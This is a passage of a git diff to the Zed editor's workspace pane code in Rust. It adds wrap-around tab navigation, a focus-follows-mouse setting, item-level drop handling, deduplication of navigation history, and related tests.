display.push('.'); - display.push(' ') } - let detail = - f(err, window, cx).unwrap_or_else(|| format!("{display}Please try again.")); + let detail = f(err, window, cx).unwrap_or(display); window.prompt(PromptLevel::Critical, &msg, Some(&detail), &["Ok"], cx) }) { prompt.await.ok(); diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index 66e5eeb4734557c818f42b6537859634435fd295..27cc96ae80a010db2dd5357a9a0bc037ca762875 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -2,6 +2,7 @@ use crate::{ CloseWindow, NewFile, NewTerminal, OpenInTerminal, OpenOptions, OpenTerminal, OpenVisible, SplitDirection, ToggleFileFinder, ToggleProjectSymbols, ToggleZoom, Workspace, WorkspaceItemBuilder, ZoomIn, ZoomOut, + focus_follows_mouse::FocusFollowsMouse as _, invalid_item_view::InvalidItemView, item::{ ActivateOnClose, ClosePosition, Item, ItemBufferKind, ItemHandle, ItemSettings, @@ -11,7 +12,7 @@ use crate::{ move_item, notifications::NotifyResultExt, toolbar::Toolbar, - workspace_settings::{AutosaveSetting, TabBarSettings, WorkspaceSettings}, + workspace_settings::{AutosaveSetting, FocusFollowsMouse, TabBarSettings, WorkspaceSettings}, }; use anyhow::Result; use collections::{BTreeSet, HashMap, HashSet, VecDeque}; @@ -34,7 +35,6 @@ use std::{ any::Any, cmp, fmt, mem, num::NonZeroUsize, - ops::ControlFlow, path::PathBuf, rc::Rc, sync::{ @@ -43,13 +43,15 @@ use std::{ }, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ ContextMenu, ContextMenuEntry, ContextMenuItem, DecoratedIcon, IconButtonShape, IconDecoration, IconDecorationKind, Indicator, PopoverMenu, PopoverMenuHandle, Tab, TabBar, TabPosition, Tooltip, prelude::*, right_click_menu, }; -use util::{ResultExt, debug_panic, maybe, paths::PathStyle, truncate_and_remove_front}; +use util::{ + ResultExt, debug_panic, maybe, paths::PathStyle, serde::default_true, truncate_and_remove_front, +}; /// A selected entry in e.g. project panel. #[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] @@ -230,13 +232,41 @@ split_structs!( SplitVertical => "Splits the pane vertically." ); +/// Activates the previous item in the pane. +#[derive(Clone, PartialEq, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = pane)] +#[serde(deny_unknown_fields, default)] +pub struct ActivatePreviousItem { + /// Whether to wrap from the first item to the last item. + #[serde(default = "default_true")] + pub wrap_around: bool, +} + +impl Default for ActivatePreviousItem { + fn default() -> Self { + Self { wrap_around: true } + } +} + +/// Activates the next item in the pane. +#[derive(Clone, PartialEq, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = pane)] +#[serde(deny_unknown_fields, default)] +pub struct ActivateNextItem { + /// Whether to wrap from the last item to the first item. + #[serde(default = "default_true")] + pub wrap_around: bool, +} + +impl Default for ActivateNextItem { + fn default() -> Self { + Self { wrap_around: true } + } +} + actions!( pane, [ - /// Activates the previous item in the pane. - ActivatePreviousItem, - /// Activates the next item in the pane. - ActivateNextItem, /// Activates the last item in the pane. ActivateLastItem, /// Switches to the alternate file. @@ -382,9 +412,6 @@ pub struct Pane { project: WeakEntity, pub drag_split_direction: Option, can_drop_predicate: Option bool>>, - custom_drop_handle: Option< - Arc) -> ControlFlow<(), ()>>, - >, can_split_predicate: Option) -> bool>>, can_toggle_zoom: bool, @@ -417,6 +444,7 @@ pub struct Pane { pinned_tab_count: usize, diagnostics: HashMap, zoom_out_on_close: bool, + focus_follows_mouse: FocusFollowsMouse, diagnostic_summary_update: Task<()>, /// If a certain project item wants to get recreated with specific data, it can persist its data before the recreation here. pub project_item_restoration_data: HashMap>, @@ -477,6 +505,9 @@ pub struct NavigationEntry { pub data: Option>, pub timestamp: usize, pub is_preview: bool, + /// Row position for Neovim-style deduplication. When set, entries with the + /// same item and row are considered duplicates and deduplicated. + pub row: Option, } #[derive(Clone)] @@ -567,7 +598,6 @@ impl Pane { workspace, project: project.downgrade(), can_drop_predicate, - custom_drop_handle: None, can_split_predicate: None, can_toggle_zoom: true, should_display_tab_bar: Rc::new(|_, cx| TabBarSettings::get_global(cx).show), @@ -587,6 +617,7 @@ impl Pane { pinned_tab_count: 0, diagnostics: Default::default(), zoom_out_on_close: true, + focus_follows_mouse: WorkspaceSettings::get_global(cx).focus_follows_mouse, diagnostic_summary_update: Task::ready(()), project_item_restoration_data: HashMap::default(), welcome_page: None, @@ -754,7 +785,6 @@ impl Pane { fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { let tab_bar_settings = TabBarSettings::get_global(cx); - let new_max_tabs = WorkspaceSettings::get_global(cx).max_tabs; if let Some(display_nav_history_buttons) = self.display_nav_history_buttons.as_mut() { *display_nav_history_buttons = tab_bar_settings.show_nav_history_buttons; @@ -767,6 +797,12 @@ impl Pane { self.nav_history.0.lock().preview_item_id = None; } + let workspace_settings = WorkspaceSettings::get_global(cx); + + self.focus_follows_mouse = workspace_settings.focus_follows_mouse; + + let new_max_tabs = workspace_settings.max_tabs; + if self.use_max_tabs && new_max_tabs != self.max_tabs { self.max_tabs = new_max_tabs; self.close_items_on_settings_change(window, cx); @@ -846,15 +882,6 @@ impl Pane { cx.notify(); } - pub fn set_custom_drop_handle(&mut self, cx: &mut Context, handle: F) - where - F: 'static - + Fn(&mut Pane, &dyn Any, &mut Window, &mut Context) -> ControlFlow<(), ()>, - { - self.custom_drop_handle = Some(Arc::new(handle)); - cx.notify(); - } - pub fn nav_history_for_item(&self, item: &Entity) -> ItemNavHistory { ItemNavHistory { history: self.nav_history.clone(), @@ -1468,7 +1495,8 @@ impl Pane { fn update_active_tab(&mut self, index: usize) { if !self.is_tab_pinned(index) { self.suppress_scroll = false; - self.tab_bar_scroll_handle.scroll_to_item(index); + self.tab_bar_scroll_handle + .scroll_to_item(index - self.pinned_tab_count); } } @@ -1487,14 +1515,14 @@ impl Pane { pub fn activate_previous_item( &mut self, - _: &ActivatePreviousItem, + action: &ActivatePreviousItem, window: &mut Window, cx: &mut Context, ) { let mut index = self.active_item_index; if index > 0 { index -= 1; - } else if !self.items.is_empty() { + } else if action.wrap_around && !self.items.is_empty() { index = self.items.len() - 1; } self.activate_item(index, true, true, window, cx); @@ -1502,14 +1530,14 @@ impl Pane { pub fn activate_next_item( &mut self, - _: &ActivateNextItem, + action: &ActivateNextItem, window: &mut Window, cx: &mut Context, ) { let mut index = self.active_item_index; if index + 1 < self.items.len() { index += 1; - } else { + } else if action.wrap_around { index = 0; } self.activate_item(index, true, true, window, cx); @@ -2859,12 +2887,13 @@ impl Pane { })) .on_aux_click( cx.listener(move |pane: &mut Self, event: &ClickEvent, window, cx| { - if !event.is_middle_click() { + if !event.is_middle_click() || is_pinned { return; } pane.close_item_by_id(item_id, SaveIntent::Close, window, cx) .detach_and_log_err(cx); + cx.stop_propagation(); }), ) .on_drag( @@ -2900,7 +2929,7 @@ impl Pane { .on_drop( cx.listener(move |this, dragged_tab: &DraggedTab, window, cx| { this.drag_split_direction = None; - this.handle_tab_drop(dragged_tab, ix, window, cx) + this.handle_tab_drop(dragged_tab, ix, false, window, cx) }), ) .on_drop( @@ -3205,6 +3234,7 @@ impl Pane { }); let entry_abs_path = pane.read(cx).entry_abs_path(entry, cx); + let reveal_path = entry_abs_path.clone(); let parent_abs_path = entry_abs_path .as_deref() .and_then(|abs_path| Some(abs_path.parent()?.to_path_buf())); @@ -3214,6 +3244,15 @@ impl Pane { let visible_in_project_panel = relative_path.is_some() && worktree.is_some_and(|worktree| worktree.read(cx).is_visible()); + let is_local = pane.read(cx).project.upgrade().is_some_and(|project| { + let project = project.read(cx); + project.is_local() || project.is_via_wsl_with_host_interop(cx) + }); + let is_remote = pane + .read(cx) + .project + .upgrade() + .is_some_and(|project| project.read(cx).is_remote()); let entry_id = entry.to_proto(); @@ -3246,8 +3285,26 @@ impl Pane { }), ) }) + .when(is_local, |menu| { + menu.when_some(reveal_path, |menu, reveal_path| { + menu.separator().entry( + ui::utils::reveal_in_file_manager_label(is_remote), + Some(Box::new( + zed_actions::editor::RevealInFileManager, + )), + window.handler_for(&pane, move |pane, _, cx| { + if let Some(project) = pane.project.upgrade() { + project.update(cx, |project, cx| { + project.reveal_path(&reveal_path, cx); + }); + } else { + cx.reveal_path(&reveal_path); + } + }), + ) + }) + }) .map(pin_tab_entries) - .separator() .when(visible_in_project_panel, |menu| { menu.entry( "Reveal In Project Panel", @@ -3449,7 +3506,7 @@ impl Pane { cx, ) .children(pinned_tabs.len().ne(&0).then(|| { - let max_scroll = self.tab_bar_scroll_handle.max_offset().width; + let max_scroll = self.tab_bar_scroll_handle.max_offset().x; // We need to check both because offset returns delta values even when the scroll handle is not scrollable let is_scrolled = self.tab_bar_scroll_handle.offset().x < px(0.); // Avoid flickering when max_offset is very small (< 2px). @@ -3549,7 +3606,7 @@ impl Pane { .on_drop( cx.listener(move |this, dragged_tab: &DraggedTab, window, cx| { this.drag_split_direction = None; - this.handle_tab_drop(dragged_tab, this.items.len(), window, cx) + this.handle_tab_drop(dragged_tab, this.items.len(), false, window, cx) }), ) .on_drop( @@ -3613,6 +3670,11 @@ impl Pane { this.drag_split_direction = None; this.handle_external_paths_drop(paths, window, cx) })) + .on_click(cx.listener(move |this, event: &ClickEvent, window, cx| { + if event.click_count() == 2 { + window.dispatch_action(this.double_click_dispatch_action.boxed_clone(), cx); + } + })) } pub fn render_menu_overlay(menu: &Entity) -> Div { @@ -3690,14 +3752,18 @@ impl Pane { &mut self, dragged_tab: &DraggedTab, ix: usize, + is_pane_target: bool, window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, dragged_tab, window, cx) + if is_pane_target + && ix == self.active_item_index + && let Some(active_item) = self.active_item() + && active_item.handle_drop(self, dragged_tab, window, cx) { return; } + let mut to_pane = cx.entity(); let split_direction = self.drag_split_direction; let item_id = dragged_tab.item.item_id(); @@ -3790,7 +3856,7 @@ impl Pane { let item_id = dragged_tab.item.item_id(); let pinned_count = self.pinned_tab_count; - self.handle_tab_drop(dragged_tab, pinned_count, window, cx); + self.handle_tab_drop(dragged_tab, pinned_count, false, window, cx); let to_pane = cx.entity(); @@ -3842,11 +3908,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, dragged_selection, window, cx) + if let Some(active_item) = self.active_item() + && active_item.handle_drop(self, dragged_selection, window, cx) { return; } + self.handle_project_entry_drop( &dragged_selection.active_selection.entry_id, dragged_onto, @@ -3862,11 +3929,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, project_entry_id, window, cx) + if let Some(active_item) = self.active_item() + && active_item.handle_drop(self, project_entry_id, window, cx) { return; } + let mut to_pane = cx.entity(); let split_direction = self.drag_split_direction; let project_entry_id = *project_entry_id; @@ -3938,11 +4006,12 @@ impl Pane { window: &mut Window, cx: &mut Context, ) { - if let Some(custom_drop_handle) = self.custom_drop_handle.clone() - && let ControlFlow::Break(()) = custom_drop_handle(self, paths, window, cx) + if let Some(active_item) = self.active_item() + && active_item.handle_drop(self, paths, window, cx) { return; } + let mut to_pane = cx.entity(); let mut split_direction = self.drag_split_direction; let paths = paths.paths().to_vec(); @@ -4404,6 +4473,7 @@ impl Render for Pane { placeholder.child(self.welcome_page.clone().unwrap()) } } + .focus_follows_mouse(self.focus_follows_mouse, cx) }) .child( // drag target @@ -4423,6 +4493,7 @@ impl Render for Pane { this.handle_tab_drop( dragged_tab, this.active_item_index(), + true, window, cx, ) @@ -4487,7 +4558,12 @@ impl Render for Pane { } impl ItemNavHistory { - pub fn push(&mut self, data: Option, cx: &mut App) { + pub fn push( + &mut self, + data: Option, + row: Option, + cx: &mut App, + ) { if self .item .upgrade() @@ -4495,7 +4571,7 @@ impl ItemNavHistory { { let is_preview_item = self.history.0.lock().preview_item_id == Some(self.item.id()); self.history - .push(data, self.item.clone(), is_preview_item, cx); + .push(data, self.item.clone(), is_preview_item, row, cx); } } @@ -4503,9 +4579,10 @@ impl ItemNavHistory { let is_preview_item = self.history.0.lock().preview_item_id == Some(self.item.id()); NavigationEntry { item: self.item.clone(), - data: data, - timestamp: 0, // not used + data, + timestamp: 0, is_preview: is_preview_item, + row: None, } } @@ -4609,12 +4686,22 @@ impl NavHistory { data: Option, item: Arc, is_preview: bool, + row: Option, cx: &mut App, ) { let state = &mut *self.0.lock(); + let new_item_id = item.id(); + + let is_same_location = + |entry: &NavigationEntry| entry.item.id() == new_item_id && entry.row == row; + match state.mode { NavigationMode::Disabled => {} NavigationMode::Normal | NavigationMode::ReopeningClosedItem => { + state + .backward_stack + .retain(|entry| !is_same_location(entry)); + if state.backward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.backward_stack.pop_front(); } @@ -4623,10 +4710,13 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); state.forward_stack.clear(); } NavigationMode::GoingBack => { + state.forward_stack.retain(|entry| !is_same_location(entry)); + if state.forward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.forward_stack.pop_front(); } @@ -4635,9 +4725,14 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } NavigationMode::GoingForward => { + state + .backward_stack + .retain(|entry| !is_same_location(entry)); + if state.backward_stack.len() >= MAX_NAVIGATION_HISTORY_LEN { state.backward_stack.pop_front(); } @@ -4646,6 +4741,7 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } NavigationMode::ClosingItem if is_preview => return, @@ -4658,6 +4754,7 @@ impl NavHistory { data: data.map(|data| Arc::new(data) as Arc), timestamp: state.next_timestamp.fetch_add(1, Ordering::SeqCst), is_preview, + row, }); } } @@ -4825,19 +4922,81 @@ impl Render for DraggedTab { #[cfg(test)] mod tests { - use std::{iter::zip, num::NonZero}; + use std::{cell::Cell, iter::zip, num::NonZero, rc::Rc}; use super::*; use crate::{ Member, item::test::{TestItem, TestProjectItem}, }; - use gpui::{AppContext, Axis, TestAppContext, VisualTestContext, size}; + use gpui::{ + AppContext, Axis, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + TestAppContext, VisualTestContext, size, + }; use project::FakeFs; use settings::SettingsStore; use theme::LoadThemes; use util::TryFutureExt; + // drop_call_count is a Cell here because `handle_drop` takes &self, not &mut self. + struct CustomDropHandlingItem { + focus_handle: gpui::FocusHandle, + drop_call_count: Cell, + } + + impl CustomDropHandlingItem { + fn new(cx: &mut Context) -> Self { + Self { + focus_handle: cx.focus_handle(), + drop_call_count: Cell::new(0), + } + } + + fn drop_call_count(&self) -> usize { + self.drop_call_count.get() + } + } + + impl EventEmitter<()> for CustomDropHandlingItem {} + + impl Focusable for CustomDropHandlingItem { + fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle { + self.focus_handle.clone() + } + } + + impl Render for CustomDropHandlingItem { + fn render( + &mut self, + _window: &mut Window, + _cx: &mut Context, + ) -> impl gpui::IntoElement { + gpui::Empty + } + } + + impl Item for CustomDropHandlingItem { + type Event = (); + + fn tab_content_text(&self, _detail: usize, _cx: &App) -> gpui::SharedString { + "custom_drop_handling_item".into() + } + + fn handle_drop( + &self, + _active_pane: &Pane, + dropped: &dyn std::any::Any, + _window: &mut Window, + _cx: &mut App, + ) -> bool { + let is_dragged_tab = dropped.downcast_ref::().is_some(); + if is_dragged_tab { + self.drop_call_count.set(self.drop_call_count.get() + 1); + } + is_dragged_tab + } + } + #[gpui::test] async fn test_add_item_capped_to_max_tabs(cx: &mut TestAppContext) { init_test(cx); @@ -5663,6 +5822,83 @@ mod tests { assert_item_labels(&pane, ["C", "A", "B*"], cx); } + #[gpui::test] + async fn test_handle_tab_drop_respects_is_pane_target(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let source_pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item_a = add_labeled_item(&source_pane, "A", false, cx); + let item_b = add_labeled_item(&source_pane, "B", false, cx); + + let target_pane = workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane(source_pane.clone(), SplitDirection::Right, window, cx) + }); + + let custom_item = target_pane.update_in(cx, |pane, window, cx| { + let custom_item = Box::new(cx.new(CustomDropHandlingItem::new)); + pane.add_item(custom_item.clone(), true, true, None, window, cx); + custom_item + }); + + let moved_item_id = item_a.item_id(); + let other_item_id = item_b.item_id(); + let custom_item_id = custom_item.item_id(); + + let pane_item_ids = |pane: &Entity, cx: &mut VisualTestContext| { + pane.read_with(cx, |pane, _| { + pane.items().map(|item| item.item_id()).collect::>() + }) + }; + + let source_before_item_ids = pane_item_ids(&source_pane, cx); + assert_eq!(source_before_item_ids, vec![moved_item_id, other_item_id]); + + let target_before_item_ids = pane_item_ids(&target_pane, cx); + assert_eq!(target_before_item_ids, vec![custom_item_id]); + + let dragged_tab = DraggedTab { + pane: source_pane.clone(), + item: item_a.boxed_clone(), + ix: 0, + detail: 0, + is_active: true, + }; + + // Dropping item_a onto the target pane itself means the + // custom item handles the drop and no tab move should occur + target_pane.update_in(cx, |pane, window, cx| { + pane.handle_tab_drop(&dragged_tab, pane.active_item_index(), true, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + custom_item.read_with(cx, |item, _| item.drop_call_count()), + 1 + ); + assert_eq!(pane_item_ids(&source_pane, cx), source_before_item_ids); + assert_eq!(pane_item_ids(&target_pane, cx), target_before_item_ids); + + // Dropping item_a onto the tab target means the custom handler + // should be skipped and the pane's default tab drop behavior should run. + target_pane.update_in(cx, |pane, window, cx| { + pane.handle_tab_drop(&dragged_tab, pane.active_item_index(), false, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + custom_item.read_with(cx, |item, _| item.drop_call_count()), + 1 + ); + assert_eq!(pane_item_ids(&source_pane, cx), vec![other_item_id]); + + let target_item_ids = pane_item_ids(&target_pane, cx); + assert_eq!(target_item_ids, vec![moved_item_id, custom_item_id]); + } + #[gpui::test] async fn test_drag_unpinned_tab_to_split_creates_pane_with_unpinned_tab( cx: &mut TestAppContext, @@ -5698,7 +5934,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, true, window, cx); }); // A should be moved to new pane. B should remain pinned, A should not be pinned @@ -5747,7 +5983,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, true, window, cx); }); // A should be moved to new pane. Both A and B should still be pinned @@ -5797,7 +6033,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should stay pinned @@ -5845,7 +6081,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should become pinned @@ -5889,7 +6125,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should stay pinned @@ -5951,7 +6187,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // E (unpinned) should be closed, leaving 3 pinned items @@ -5986,7 +6222,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should still be pinned and active @@ -6026,7 +6262,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A stays pinned @@ -6063,7 +6299,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // Neither are pinned @@ -6100,7 +6336,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A becomes unpinned @@ -6137,7 +6373,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A becomes unpinned @@ -6173,7 +6409,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A stays pinned, B and C remain unpinned @@ -6214,7 +6450,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should become pinned since it was dropped in the pinned region @@ -6256,7 +6492,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, true, window, cx); }); // A should remain unpinned since it was dropped outside the pinned region @@ -6303,7 +6539,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should be after B and all are pinned @@ -6318,7 +6554,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A should be after C and all are pinned @@ -6333,7 +6569,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should be before C and all are pinned @@ -6348,7 +6584,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should be before B and all are pinned @@ -6380,7 +6616,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A should be at the end @@ -6412,7 +6648,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // C should be at the beginning @@ -6421,8 +6657,6 @@ mod tests { #[gpui::test] async fn test_drag_tab_to_middle_tab_with_mouse_events(cx: &mut TestAppContext) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); let fs = FakeFs::new(cx.executor()); @@ -6474,8 +6708,6 @@ mod tests { async fn test_drag_pinned_tab_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6551,8 +6783,6 @@ mod tests { async fn test_drag_unpinned_tab_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6605,8 +6835,6 @@ mod tests { async fn test_drag_mixed_tabs_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6670,6 +6898,145 @@ mod tests { assert_item_labels(&pane, ["A!", "B!", "D", "E", "C*", "F"], cx); } + #[gpui::test] + async fn test_middle_click_pinned_tab_does_not_close(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item_a = add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + + pane.update_in(cx, |pane, window, cx| { + pane.pin_tab_at( + pane.index_for_item_id(item_a.item_id()).unwrap(), + window, + cx, + ); + }); + assert_item_labels(&pane, ["A!", "B*"], cx); + cx.run_until_parked(); + + let tab_a_bounds = cx + .debug_bounds("TAB-0") + .expect("Tab A (index 1) should have debug bounds"); + let tab_b_bounds = cx + .debug_bounds("TAB-1") + .expect("Tab B (index 2) should have debug bounds"); + + cx.simulate_event(MouseDownEvent { + position: tab_a_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: tab_a_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseDownEvent { + position: tab_b_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: tab_b_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + }); + + cx.run_until_parked(); + + assert_item_labels(&pane, ["A*!"], cx); + } + + #[gpui::test] + async fn test_double_click_pinned_tab_bar_empty_space_creates_new_tab(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + // The real NewFile handler lives in editor::init, which isn't initialized + // in workspace tests. Register a global action handler that sets a flag so + // we can verify the action is dispatched without depending on the editor crate. + // TODO: If editor::init is ever available in workspace tests, remove this + // flag and assert the resulting tab bar state directly instead. + let new_file_dispatched = Rc::new(Cell::new(false)); + cx.update(|_, cx| { + let new_file_dispatched = new_file_dispatched.clone(); + cx.on_action(move |_: &NewFile, _cx| { + new_file_dispatched.set(true); + }); + }); + + set_pinned_tabs_separate_row(cx, true); + + let item_a = add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + + pane.update_in(cx, |pane, window, cx| { + let ix = pane + .index_for_item_id(item_a.item_id()) + .expect("item A should exist"); + pane.pin_tab_at(ix, window, cx); + }); + assert_item_labels(&pane, ["A!", "B*"], cx); + cx.run_until_parked(); + + let pinned_drop_target_bounds = cx + .debug_bounds("pinned_tabs_border") + .expect("pinned_tabs_border should have debug bounds"); + + cx.simulate_event(MouseDownEvent { + position: pinned_drop_target_bounds.center(), + button: MouseButton::Left, + modifiers: Modifiers::default(), + click_count: 2, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: pinned_drop_target_bounds.center(), + button: MouseButton::Left, + modifiers: Modifiers::default(), + click_count: 2, + }); + + cx.run_until_parked(); + + // TODO: If editor::init is ever available in workspace tests, replace this + // with an assert_item_labels check that verifies a new tab is actually created. + assert!( + new_file_dispatched.get(), + "Double-clicking pinned tab bar empty space should dispatch the new file action" + ); + } + #[gpui::test] async fn test_add_item_with_new_item(cx: &mut TestAppContext) { init_test(cx); @@ -7935,6 +8302,71 @@ mod tests { ); } + #[gpui::test] + async fn test_pinned_tabs_scroll_to_item_uses_correct_index(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + cx.simulate_resize(size(px(400.), px(300.))); + + for label in ["A", "B", "C"] { + add_labeled_item(&pane, label, false, cx); + } + + pane.update_in(cx, |pane, window, cx| { + pane.pin_tab_at(0, window, cx); + pane.pin_tab_at(1, window, cx); + pane.pin_tab_at(2, window, cx); + }); + + for label in ["D", "E", "F", "G", "H", "I", "J", "K"] { + add_labeled_item(&pane, label, false, cx); + } + + assert_item_labels( + &pane, + ["A!", "B!", "C!", "D", "E", "F", "G", "H", "I", "J", "K*"], + cx, + ); + + cx.run_until_parked(); + + // Verify overflow exists (precondition for scroll test) + let scroll_handle = + pane.update_in(cx, |pane, _window, _cx| pane.tab_bar_scroll_handle.clone()); + assert!( + scroll_handle.max_offset().x > px(0.), + "Test requires tab overflow to verify scrolling. Increase tab count or reduce window width." + ); + + // Activate a different tab first, then activate K + // This ensures we're not just re-activating an already-active tab + pane.update_in(cx, |pane, window, cx| { + pane.activate_item(3, true, true, window, cx); + }); + cx.run_until_parked(); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_item(10, true, true, window, cx); + }); + cx.run_until_parked(); + + let scroll_handle = + 